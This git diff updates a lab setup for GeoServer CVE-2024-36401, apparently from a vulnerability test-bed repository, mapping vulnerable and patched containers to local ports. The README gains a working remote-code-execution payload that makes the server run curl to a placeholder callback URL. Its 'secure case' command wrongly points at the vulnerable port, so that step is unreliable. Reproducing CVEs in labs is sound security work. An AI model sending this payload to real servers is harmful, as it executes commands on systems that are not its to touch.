google · robert-doyensec · May 8, 2026 · Jun 3, 2026
diff --git a/geoserver/CVE-2024-36401/README.md b/geoserver/CVE-2024-36401/README.md
@@ -11,11 +11,20 @@ docker-compose up -d
 ```
 
 The services will be available at:
-- **Vulnerable**: Service `vuln` (GeoServer 2.25.1)
-- **Safe**: Service `safe` (GeoServer 2.25.2)
+- **Vulnerable**: Service `vuln` (GeoServer 2.25.1) at port `8081`
+- **Safe**: Service `safe` (GeoServer 2.25.2) at port `8082`
 
-To find the host port for GeoServer (port 8080):
-```bash
-docker-compose port vuln 8080
-docker-compose port safe 8080
+
+## Reproducing the vulnerability
+
+Vulnerable case (replace YOUR_CALLBACK_URL with your own web server):
+```
+curl "http://localhost:8081/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl%20YOUR_CALLBACK_URL')"
+```
+The callback server will receive an http request with curl's user agent.
+
+Secure case (replace YOUR_CALLBACK_URL with your own web server):
+```
+curl "http://localhost:8081/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl%20YOUR_CALLBACK_URL')"
 ```
+No callback will be received.
diff --git a/geoserver/CVE-2024-36401/docker-compose.yml b/geoserver/CVE-2024-36401/docker-compose.yml
@@ -2,8 +2,8 @@ services:
   vuln:
     image: docker.osgeo.org/geoserver:2.25.1
     ports:
-      - "8080"
+      - "8081:8080"
   safe:
     image: docker.osgeo.org/geoserver:2.25.2
     ports:
-      - "8080"
+      - "8082:8080"